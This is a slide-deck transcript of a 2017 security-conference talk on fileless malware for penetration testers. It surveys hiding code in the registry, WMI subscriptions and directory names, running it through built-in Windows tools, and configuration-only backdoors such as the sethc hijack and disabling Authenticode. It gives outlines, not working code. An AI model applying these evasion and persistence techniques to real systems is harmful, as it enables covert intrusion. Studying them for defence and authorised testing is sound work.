Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Fileless Malware Infections

619 views

Published on

Malware tricks for Pentesters
Bsides Lisbon 2017

Published in: Software
  • Be the first to comment

Fileless Malware Infections

  1. 1. FileLess Malware Infections Malware tricks for Pentesters Ramon Pinuaga Bsides Lisbon 2017
  2. 2. 2 1) Presentation 2) Real world examples 3) Process • Infection • Persistence 4) Conclusions Index
  3. 3. PRESENTATION
  4. 4. 4 • Pentester for many, many years. • Current position: Cybersecurity Audit Manager at PROSEGUR Spain. • I prefer the offensive side of security. Who are you?
  5. 5. 5 • Malicious code that doesn't need to create or drop regular files on the system. • Move away from the traditional monolithic malware or pentesting framework. • For persistence we usually need to leave at least something on the system but we can hide it and make it very small. What is FileLess Malware?
  6. 6. 7 • We have 2 main ways to achieve an infection without files: • Not using malware (or code) at all. E.G. planting a configuration only backdoor on a system. That way we don’t control the system all the time but we can access it later. • Using code that never touches disk. In his clear form. For persistence we always need a way to keep at least the first stage of the code on the system. FileLess or MalwareLess?
  7. 7. 8 • Evading Antivirus detection: No file, No scan, No VirusTotal upload.  • Leaving a smaller forensic trail: Less artifacts. • Difficult environments (hard to upload things). • Helps in bypassing Application Whitelisting (SRP, Applocker, etc.) Why FileLess in pentesting?
  8. 8. 10 • Long-term persistence. • Kernel-level access. • High level hiding. • Quickness and simplicity: Only userland, No rootkits, No NSA like implants. Pentest vs APT
  9. 9. DEMO: RDP + Sethc • Enable remote desktop • Hijack sethc.exe • Change RDP port • Open windows firewall
  10. 10. 13 • Keeping all in memory. (Problem: no persistence) • Storing the code in non-file or non-regular storage (classics): • Outside the filesystem: UEFI, HDD Firmware, Hidden disk areas, $EA, etc. (We are not going that far, remember; only userland) • Network / External systems. • Alternate Data Streams (ADS). • Registry. How to keep code without files?
  11. 11. 14 • WMI (subscriptions). • Windows events (.evt). • Inside Documents (.doc, .xls, .pdf). • File/Directory names (0-day). • Environment variables (more 0-day). Novel non-regular storage
  12. 12. DEMO: Code in filenames • Stage 1: Run key • Stage 2: Environment • Stage 3: Dir names
  13. 13. 17 • Remote injection in memory -> Remote call or exploit. • Load of remote binaries (EXEs, DLLs) -> Via SMB, WebDAV, etc. • Scripting languages -> Loaded remotely or from the command line. • PowerShell (Powershell.exe) • Javascript/Vbscript (Cscript.exe, Wscript.exe, Mshta.exe, Rundll32.exe, Regsvr32.exe). • .Net assemblies (InstallUtil.exe, IEExec.exe, RegAsm.exe). How to execute code without files?
  14. 14. 18 • Tools already installed on the system (no new files). • Tools that allow receiving external input (via command line or via the network). • Bonus: Tools signed by Microsoft. Our FileLess pentest framework
  15. 15. REAL WORLD EXAMPLES
  16. 16. 20 • Worms (memory only): • Slammer. • Poweliks. • WMIGhost. • Empire. • Duqu 2.0 (Kaspersky). Real world examples
  17. 17. 21 • Worm that infected thousands of computers and impacted general Internet traffic in some areas. • The worm exploited a buffer overflow vulnerability in Microsoft SQL Server resolution service (1434/UDP). • Only 376 bytes and fitted into a single UDP packet. Slammer (2003)
  18. 18. 22 • Infection via Word macro (No FileLess). • Persistence via Autostart registry key (HKLMSoftwareMicrosoftWindowsCurrentVersion Run). • Minimal first stage: Uses clever rundll32 trick to run Javascript code. • Next stages also stored in the registry (encoded). Runs PowerShell code. • PowerShell injects a DLL in another process memory, without touching disk. Poweliks (2014)
  19. 19. 23 Poweliks – Rundll32 trick
  20. 20. 24 • Infection via Word macro. • Dropper and UAC bypass binaries touch disk (not fully FileLess). • Then it register the permanent and necessary WMI classes: event definition, event filter and event consumer. • It uses Javascript for payload code in the event consumer active script. WMIghost (2014)
  21. 21. 25 • PowerShell based RAT. • It tries to be as FileLess as possible. • Mostly working from memory only. • Various options for persistent storage: Registry, ADS, Eventlog and of course WMI subscriptions. Empire (2015)
  22. 22. 26 • Unknown infection vector. • Only a few selected hosts were used for on-disk persistence. • These hosts injected the malware remotely into other systems memory. • For this task the malware gained domain administrator privileges and then it deployed MSI packages (via a new service or a scheduled task). Duqu 2.0 (2015)
  23. 23. 28 • First stage: Minimal. Usually a small vbs or js (not directly PowerShell). • Second Stage: Main script based on PowerShell. More complex and powerful logic that injects a binary into another process. • Third stage: Binary. Usually a PE DLL payload. More similar to traditional malware, but never touches disk. Common FileLess behavior
  24. 24. PROCESS
  25. 25. 30 • An ideal FileLess pentest operation should cover the following phases: 1. FileLess Infection. 2. Installation of FileLess Backdoors. 3. Gain FileLess Persistence. Operation Process
  26. 26. 31 • Infection without sending any files. • Not common. Even known FileLess APT operations use some kind of files in this stage. • Preferably, we need to deliver the exploit before the application layer. • Inside a stream. • At the lower network layers (e.g. SMB or SSL exploits). • Open network services (e.g. Eternalblue). FileLess Infection
  27. 27. 32 • Configuration only backdoors (no code). • Some popular: • Create user + Remote exec (Psexec/Sc, WMI, SchTasks, WinRM, PSRemoting). • Binary Image Hijack + Remote Desktop. • Silver/Golden tickets. • Proxy + Decrease security. FileLess Backdoors
  28. 28. 34 • First stage: Registry Autostart entries. • Run entries. • Scheduled tasks. • Image hijacks. • WMI. • Services (not very elegant). • Usually too noisy! For a human analyst but harder to detect with automated tools because we are not using any files. FileLess persistence
  29. 29. CONCLUSIONS
  30. 30. 36 • Full pentest operations are possible without using any files (or almost). • We need some “resident” artifacts on the system, but these can be very small and can be easily hidden. Conclusions
  31. 31. 37 • Questions? Comments? • https://twitter.com/rpinuaga Thanks
  32. 32. 38 • A lot of ideas taken from: • Casey Smith: https://twitter.com/subtee • Didier Stevens: https://twitter.com/DidierStevens • Alex Abramov: https://twitter.com/codereversing • Rob Fuller: https://twitter.com/mubix • Cneelis: https://twitter.com/Cneelis • Matt Nelson: https://twitter.com/enigma0x3 • Matt Graeber: https://twitter.com/mattifestation • James Foreshaw - https://twitter.com/tiraniddo Previous research
  33. 33. www.prosegur.com
  34. 34. DEMO: Proxy + Authenticode • Convince the user to execute a .REG file • Configure Proxy • Disable Authenticode validation • Wait for EXE download

×